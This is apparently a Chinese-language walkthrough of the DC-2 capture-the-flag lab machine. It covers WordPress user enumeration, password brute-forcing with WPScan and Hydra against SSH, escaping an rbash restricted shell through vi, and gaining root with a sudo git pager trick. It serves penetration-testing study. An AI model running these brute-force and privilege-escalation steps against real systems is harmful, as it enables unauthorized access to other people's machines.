信息收集
端口扫描
1 | PORT STATE SERVICE VERSION |
开放端口:80、7744
设置 hosts,访问 Web 页面:WordPress
WPScan 扫描
1 | ########## word theme ########### |
WordPress version 4.7.10
WordPress theme in use: twentyseventeen
目录扫描
漏洞搜索
1 | $searchsploit wordpress 4.7.1 |
Wordpress 4.7.1:用户名枚举
用户枚举&密码爆破
1 | $wpscan --url http://dc-2 -e u |
1 | wpscan --url http://dc-2 -U users.txt -P dict.txt |
将用户名密码 代入 SSH 测试
1 | $hydra -L user.txt -P dict.txt ssh://172.16.252.134:7744 |
情报整理
1 | ##### 端口 #### |
登录后台
除 Flag2 外,没有多少有用的信息
SSH 登录
1 | $ssh -p 7744 tom |
登录的 shell 为受限制的 rbash,使用 vi 绕过:
1 | :set shell=/bin/bash |
HOME 目录下得到 Flag3,cat、tail 命令不存在,但可以使用 less
信息收集
1 | #### /etc/passwd #### |
HOME 下有个 usr 目录,其内是当前用户可以使用的 4 个命令,想到还有个 jerry 用户且还有对应的密码(不知可不可行),因为 4 个可用命令不包括 su 命令,这里脑子差点转不过来了,其实可以用 绝对路径 执行命令
1 | $ /usr/bin/find / -iname su -type f 2>/dev/null |
提权
使用 jerry 的密码登录后,查看自己可以干什么(sudo -l
):
1 | Matching Defaults entries for jerry on DC-2: |
使用 git 提权:
1 | $sudo git -p help |
Flag 找不找都无所谓了,重要的是这个渗透过程学到的技能